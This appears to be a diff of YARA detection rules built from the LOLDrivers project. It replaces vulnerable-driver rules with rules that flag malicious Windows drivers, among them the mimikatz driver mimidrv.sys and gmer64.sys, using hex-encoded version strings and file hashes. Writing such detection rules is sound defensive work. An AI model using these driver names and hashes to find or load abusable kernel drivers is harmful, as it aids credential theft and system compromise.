+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "f35db7b6-8a4b-5c26-9e00-da5c1c7780e8"
+		id = "a9965f8f-4969-52ae-953f-a06d8fabe951"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11398-L11415"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L238-L287"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91"
-		hash = "ab2632a4d93a7f3b7598c06a9fdc773a1b1b69a7dd926bdb7cf578992628e9dd"
-		logic_hash = "d43a364d3f39951140fa3b3395f1d74c306558a6c6946f665873e72377345949"
-		score = 40
+		hash = "14b89298134696f2fd1b1df0961d36fa6354721ea92498a349dc421e79447925"
+		hash = "36c65aeb255c06898ffe32e301030e0b74c8bca6fe7be593584b8fdaacd4e475"
+		hash = "673bbc7fa4154f7d99af333014e888599c27ead02710f7bc7199184b30b38653"
+		hash = "5295080de37d4838e15dec4e3682545033d479d3d9ac28d74747c086559fb968"
+		hash = "8684aec77b4c3cafc1a6594de7e95695fa698625d4206a6c4b201875f76a5b38"
+		hash = "69866557566c59772f203c11f5fba30271448e231b65806a66e48f41e3804d7f"
+		hash = "a42f4ae69b8755a957256b57eb3d319678eab81705f0ffea0d649ace7321108f"
+		hash = "62036cdf3663097534adf3252b921eed06b73c2562655eae36b126c7d3d83266"
+		hash = "1ef7afea0cf2ef246ade6606ef8b7195de9cd7a3cd7570bff90ba1e2422276f6"
+		hash = "b34e2d9f3d4ef59cf7af18e17133a6a06509373e69e33c8eecb2e30501d0d9e4"
+		hash = "0aab2deae90717a8876d46d257401d265cf90a5db4c57706e4003c19eee33550"
+		hash = "15cf366f7b3ee526db7ce2b5253ffebcbfaa4f33a82b459237c049f854a97c0c"
+		hash = "c4c9c84b211899ceb0d18a839afa497537a7c7c01ab481965a09788a9e16590c"
+		hash = "618b15970671700188f4102e5d0638184e2723e8f57f7e917fa49792daebdadb"
+		hash = "4bca0a401b364a5cc1581a184116c5bafa224e13782df13272bc1b748173d1be"
+		hash = "c7bccc6f38403def4690e00a0b31eda05973d82be8953a3379e331658c51b231"
+		hash = "822982c568b6f44b610f8dc4ab5d94795c33ae08a6a608050941264975c1ecdb"
+		hash = "b8c71e1844e987cd6f9c2baf28d9520d4ccdd8593ce7051bb1b3c9bf1d97076a"
+		hash = "26bea3b3ab2001d91202f289b7e41499d810474607db7a0893ceab74f5532f47"
+		hash = "c8ae217860f793fce3ad0239d7b357dba562824dd7177c9d723ca4d4a7f99a12"
+		hash = "a78c9871da09fab21aec9b88a4e880f81ecb1ed0fa941f31cc2f041067e8e972"
+		hash = "82b7fa34ad07dbf9afa63b2f6ed37973a1b4fe35dee90b3cf5c788c15c9f08f7"
+		hash = "6d68d8a71a11458ddf0cbb73c0f145bee46ef29ce03ad7ece6bd6aa9d31db9b7"
+		hash = "52f3905bbd97dcd2dbd22890e5e8413b9487088f1ee2fa828030a6a45b3975fd"
+		hash = "64d4370843a07e25d4ceb68816015efcaeca9429bb5bb692a88e615b48c7da96"
+		hash = "f3ec3f22639d45b3c865bb1ed7622db32e04e1dbc456298be02bf1f3875c3aac"
+		hash = "51805bb537befaac8ce28f2221624cb4d9cefdc0260bc1afd5e0bc97bf1f9f93"
+		hash = "c4fb31e3f24e40742a1b9855a2d67048fe64b26d8d2dbcec77d2d5deeded2bcc"
+		hash = "d50cb5f4b28c6c26f17b9d44211e515c3c0cc2c0c4bf24cd8f9ed073238053ad"
+		hash = "4999541c47abd4a7f2a002c180ae8d31c19804ce538b85870b8db53d3652862b"
+		hash = "a32dc2218fb1f538fba33701dfd9ca34267fda3181e82eb58b971ae8b78f0852"
+		logic_hash = "e4d4b0da09beff889931b8d90365c3a04ff4b5b410004fb820cb2551365cf63c"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005a0041004d }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005a0065006d0061006e00610020004c00740064002e }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e00320031002e00360033 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005a0041004d }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]005a0065006d0061006e00610020004c00740064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0031002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0031002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310037002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Sysinternalswwwsysinternalscom_Procexpsys_Processexplorer_30AB : FILE
+rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_41AD
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - procexp.Sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "cd4dd891-8d86-5afa-83ed-1ad0997608de"
+		id = "8a8887dd-0f3d-5ab4-a945-b47966789b99"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11418-L11437"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L290-L324"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "30abc0cc700fdebc74e62d574addc08f6227f9c7177d9eaa8cbc37d5c017c9bb"
-		logic_hash = "7e1f69495559ca298a05ef6fb3817799b09d66013bae574ec585d27ef89b4dcc"
-		score = 40
+		hash = "41ad660820c41fc8b1860b13dc1fea8bc8cb2faceb36ed3e29d40d28079d2b1f"
+		hash = "a7a665a695ec3c0f862a0d762ad55aff6ce6014359647e7c7f7e3c4dc3be81b7"
+		hash = "9a42fa1870472c38a56c0a70f62e57a3cdc0f5bc142f3a400d897b85d65800ac"
+		hash = "f6157e033a12520c73dcedf8e49cd42d103e5874c34d6527bb9de25a5d26e5ad"
+		hash = "31b66a57fae0cc28a6a236d72a35c8b6244f997e700f9464f9cbf800dbf8bee6"
+		hash = "1d23ab46ad547e7eef409b40756aae9246fbdf545d13946f770643f19c715e80"
+		hash = "704c6ffe786bc83a73fbdcd2edd50f47c3b5053da7da6aa4c10324d389a31db4"
+		hash = "200f98655d1f46d2599c2c8605ebb7e335fee3883a32135ca1a81e09819bc64a"
+		hash = "4bd4715d2a7af627da11513e32fab925c872babebdb7ff5675a75815fbf95021"
+		hash = "9e56e96df36237e65b3d7dbc490afdc826215158f6278cd579c576c4b455b392"
+		hash = "8b32fc8b15363915605c127ccbf5cbe71778f8dfbf821a25455496e969a01434"
+		hash = "b0a27ac1a8173413de13860d2b2e34cb6bc4d1149f94b62d319042e11d8b004c"
+		hash = "07beac65e28ee124f1da354293a3d6ad7250ed1ce29b8342acfd22252548a5af"
+		hash = "c4f041de66ec8cc5ab4a03bbc46f99e073157a4e915a9ab4069162de834ffc5c"
+		hash = "26ef7b27d1afb685e0c136205a92d29b1091e3dcf6b7b39a4ec03fbbdb57cb55"
+		hash = "406b844f4b5c82caf26056c67f9815ad8ecf1e6e5b07d446b456e5ff4a1476f9"
+		logic_hash = "a51e3e4c17122bf15b70b47693c3d24792cc7c7cbead1b26e501cb2907113968"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00500072006f00630065007300730020004500780070006c006f007200650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0053007900730069006e007400650072006e0061006c00730020002d0020007700770077002e0073007900730069006e007400650072006e0061006c0073002e0063006f006d }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310031002e00330030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310031002e00330030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00700072006f0063006500780070002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500072006f00630065007300730020004500780070006c006f007200650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00700072006f0063006500780070002e005300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028004300290020004d002e002000520075007300730069006e006f007600690063006800200031003900390036002d0032003000300038 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0032002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0032002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310039002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Zemanaltd_Zam_DE8F : FILE
+rule LOLDRIVERS_MAL_Driver_Sensecorp_42B2
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - zam64.sys, zamguard32.sys, zamguard64.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - Sense5Ext.sys"
 		author = "Florian Roth"
-		id = "245da08c-d629-53cb-83fb-476f4fdd1512"
+		id = "6b64ff77-866b-5d77-b2cf-5e507acc6cb9"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11440-L11456"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L327-L343"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "de8f8006d8ee429b5f333503defa54b25447f4ed6aeade5e4219e23f3473ef1c"
-		logic_hash = "0cb5b26dd0cd26c77df642ea6bfffdcede293cdb1ecc15430241ab538f835162"
-		score = 40
+		hash = "42b22faa489b5de936db33f12184f6233198bdf851a18264d31210207827ba25"
+		logic_hash = "72e213913bf4317fa0751775e6a1a82ba2706e79c52fcd3e2c8ca69050e3a9d7"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005a0041004d }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005a0065006d0061006e00610020004c00740064002e }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e00320030002e003100300034 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005a0041004d }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]005a0065006d0061006e00610020004c00740064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00530065006e0073006500350020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00530065006e00730065003500200043004f00520050 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0035002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0035002e0030002e0030 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000320032 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Nvidiacorp_Nvoclocksys_Nvidiasystemutilitydriver_0FC0 : FILE
+rule LOLDRIVERS_MAL_Driver_Legalcorp_Pciexpressvideocapture_FD22
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - nvoclock.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - PcieCubed.sys"
 		author = "Florian Roth"
-		id = "00b4e2c2-cb2b-5de7-be7f-67fd1ed5bb1f"
+		id = "c9b28922-d4c7-5c09-9df8-b7b8d8ffc2e8"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11459-L11478"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L346-L364"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "0fc0644085f956706ea892563309ba72f0986b7a3d4aa9ae81c1fa1c35e3e2d3"
-		logic_hash = "be5fef829971251225d9cbb72d173affd394c8cce6116b0b705c4b02409b6096"
-		score = 40
+		hash = "fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8"
+		logic_hash = "4c47a159595f420c520e6924238bd260f49ccf163208713c72c62638b13756d9"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004e00560069006400690061002000530079007300740065006d0020005500740069006c0069007400790020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004e0056006900640069006100200043006f00720070002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0033002e00300030002e00300030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0033002e00300030002e00300030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e0076006f0063006c006f0063006b002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004e00560069006400690061002000530079007300740065006d0020005500740069006c0069007400790020004400720069007600650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e0076006f0063006c006f0063006b002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a9004e0056004900440049004100200043006f00720070002e00200032003000300033002d0032003000300034 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005000430049006500200056006900640065006f00200043006100700074007500720065 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004c006500670061006c00200043006f00720070002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e00310035 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030002e0030002e00310035 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0050004300490020004500780070007200650073007300200056006900640065006f00200043006100700074007500720065 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005000630069006500430075006200650064002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00320030003100360020004c006500670061006c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Supermicrocomputerinc_Phymem_Phymem_1963 : FILE
+rule LOLDRIVERS_MAL_Driver_Windowsrwinddkprovider_Netfiltersys_Windowsrwinddkdriver_2060
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - phymem64.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_206006a1.sys"
 		author = "Florian Roth"
-		id = "19673477-eb54-52d7-886e-ebf3216aa77b"
+		id = "3b3135ae-8e40-5eca-a27e-91c62040b95d"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11481-L11500"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L367-L386"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52"
-		logic_hash = "8f4cdca4c4bc91f216ee3d89093d482d6e56623a159c3eae6debc388cb9d108f"
-		score = 40
+		hash = "206006a11f233b9ae876952308f6d60d7a75c80b4d530a3e6146a0b4d8cd3e4f"
+		logic_hash = "e08a60ea78951ad56ce06ae3936ac5e1987d066224f79353e812a067265b5a28"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]007000680079006d0065006d0020004100700070006c00690063006100740069006f006e }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005300750070006500720020004d006900630072006f00200043006f006d00700075007400650072002c00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002c00200030002c00200030002c00200030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002c00200030002c00200030002c00200030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]007000680079006d0065006d }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]007000680079006d0065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]007000680079006d0065006d002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400280063002900200031003900390033002d00320030003100350020005300750070006500720020004d006900630072006f00200043006f006d00700075007400650072002c00200049006e0063002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004e0065007400460069006c007400650072002000530044004b00200057004600500020004400720069007600650072002000280057005000500029 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b002000700072006f00760069006400650072 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0036002e0035002e0037 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0032002e0039003200300030002e00320030003500350037 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e0065007400660069006c0074006500720032002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b0020006400720069007600650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e0065007400660069006c0074006500720032002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a90020004e0065007400460069006c00740065007200530044004b002e0063006f006d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Sysinternalswwwsysinternalscom_Procexpsys_Processexplorer_16A2 : FILE
+rule LOLDRIVERS_MAL_Driver_Pinchinstechnologycoltd_Rwtkrlsys_Ransomwareterminator_1A74
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - procexp.Sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_1a74c2bd.sys"
 		author = "Florian Roth"
-		id = "826ee893-06af-5dee-9436-ec3ea7ddd8d9"
+		id = "63f1a594-8549-5b93-97d7-883fdca263f1"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11503-L11523"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L389-L408"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "16a2e578bc8683f17a175480fea4f53c838cfae965f1d4caa47eaf9e0b3415c1"
-		hash = "98a123b314cba2de65f899cdbfa386532f178333389e0f0fbd544aff85be02eb"
-		logic_hash = "ee91ed74d1577bc881a029a6790de6d41e0b9494bfeeceec4511b3d8b7c5cff2"
-		score = 40
+		hash = "1a74c2bde0c9a76486657ccb9c79ea87c9891a32cdd4aa15c7542f7c9487a539"
+		logic_hash = "b430f08ecf891aa9f6cfb3bc5278413045f6dddfe70f4ad51ab8ccc218a7a379"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00500072006f00630065007300730020004500780070006c006f007200650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0053007900730069006e007400650072006e0061006c00730020002d0020007700770077002e0073007900730069006e007400650072006e0061006c0073002e0063006f006d }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310036002e00340032 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310036002e00340032 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00700072006f0063006500780070002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500072006f00630065007300730020004500780070006c006f007200650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00700072006f0063006500780070002e005300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028004300290020004d00610072006b002000520075007300730069006e006f007600690063006800200031003900390036002d0032003000320031 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005200570054004b0072006c }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e0031003000300036 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00520061006e0073006f006d0077006100720065005400650072006d0069006e00610074006f0072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310036002000500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Vektortsecurityservice_Vboxdrv_Antidetectpublic_CFB7 : FILE
+rule LOLDRIVERS_MAL_Driver_Gmer_Gmersys_Gmer_0052
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - VBoxDrv.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - gmer64.sys, superman.sys"
 		author = "Florian Roth"
-		id = "e80a43d2-d96f-5fed-a5e1-3e1ea617542a"
+		id = "a2197304-4455-52bb-ac73-9218b310bb99"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11526-L11545"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L411-L431"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "cfb7af8ac67a379e7869289aeee21837c448ea6f8ab6c93988e7aa423653bd40"
-		logic_hash = "8611a572b8366722e237d622b3701072f564f13a73dd71899dbde6faeab73ef8"
-		score = 40
+		hash = "0052aa88e42055a2eed5ddd17c3499c692360155e5e031a211edfcef577acce3"
+		hash = "18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7"
+		logic_hash = "1644a972cb9bde33e5e8ec078b0ee67b34b6a298504895f364260b96a453a3ba"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600690072007400750061006c0042006f007800200053007500700070006f007200740020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00560065006b0074006f0072002000540031003300200053006500630075007200690074007900200053006500720076006900630065 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0034002e0030002e003100310039003200330030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0034002e0030002e003100310039003200330030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00560042006f0078004400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041006e00740069006400650074006500630074002000320030003100390020005000750062006c00690063 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00560042006f0078004400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300039002d00320030003100390020004f007200610063006c006500200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0047004d00450052002000440072006900760065007200200068007400740070003a002f002f007700770077002e0067006d00650072002e006e00650074 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0047004d00450052 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002c00200030002c002000360039003800330020006200750069006c0074002000620079003a002000570069006e00440044004b }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002c00200030002c00200036003900380033 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0067006d0065007200360034002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0047004d00450052 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0067006d0065007200360034002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200047004d0045005200200032003000300033002d0032003000310033 }
 
 	condition:
